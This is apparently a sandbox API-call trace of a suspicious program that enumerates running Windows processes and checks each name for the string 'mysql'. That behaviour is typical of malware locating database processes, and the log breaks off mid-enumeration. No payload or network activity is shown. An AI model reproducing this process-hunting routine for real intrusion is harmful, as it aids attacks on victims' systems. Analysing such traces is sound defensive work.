[0176.958] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mysql") returned 0x0 [0176.958] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.959] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585678 [0176.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585678, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.959] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.959] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0176.960] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35869f0 [0176.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35869f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0176.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0176.961] StrStrIA (lpFirst="dwm.exe", lpSrch="mysql") returned 0x0 [0176.961] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.962] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585528 [0176.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.962] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.962] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.963] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585558 [0176.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585558, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.963] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.963] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.965] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585648 [0176.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.965] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.965] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.966] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585660 [0176.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.966] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.966] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.967] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585630 [0176.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.967] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.967] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.969] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35856d8 [0176.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35856d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.969] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.969] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.970] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35853f0 [0176.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35853f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.970] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.970] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.137] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585438 [0177.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.137] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.137] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.138] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35856f0 [0177.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35856f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.139] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.139] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.140] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585738 [0177.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.140] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.140] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.141] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585708 [0177.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3585708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0177.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0177.141] StrStrIA (lpFirst="spoolsv.exe", lpSrch="mysql") returned 0x0 [0177.141] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.143] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585720 [0177.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.143] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.143] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.144] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585750 [0177.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3585750, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0177.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0177.144] StrStrIA (lpFirst="audiodg.exe", lpSrch="mysql") returned 0x0 [0177.144] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.145] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581880 [0177.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3581880, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0177.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0177.145] StrStrIA (lpFirst="sihost.exe", lpSrch="mysql") returned 0x0 [0177.146] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.147] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581970 [0177.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.147] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.147] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.148] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581850 [0177.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3581850, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0177.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0177.148] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mysql") returned 0x0 [0177.148] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.154] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581958 [0177.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3581958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0177.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0177.154] StrStrIA (lpFirst="explorer.exe", lpSrch="mysql") returned 0x0 [0177.154] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.155] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595b88 [0177.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3595b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0177.155] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0177.155] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="mysql") returned 0x0 [0177.156] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0177.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0177.157] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586250 [0177.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3586250, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0177.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0177.157] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="mysql") returned 0x0 [0177.157] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0177.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.158] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595e48 [0177.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3595e48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0177.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0177.158] StrStrIA (lpFirst="Memory Compression", lpSrch="mysql") returned 0x0 [0177.158] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.159] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35818b0 [0177.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35818b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0177.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0177.160] StrStrIA (lpFirst="SearchUI.exe", lpSrch="mysql") returned 0x0 [0177.160] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: 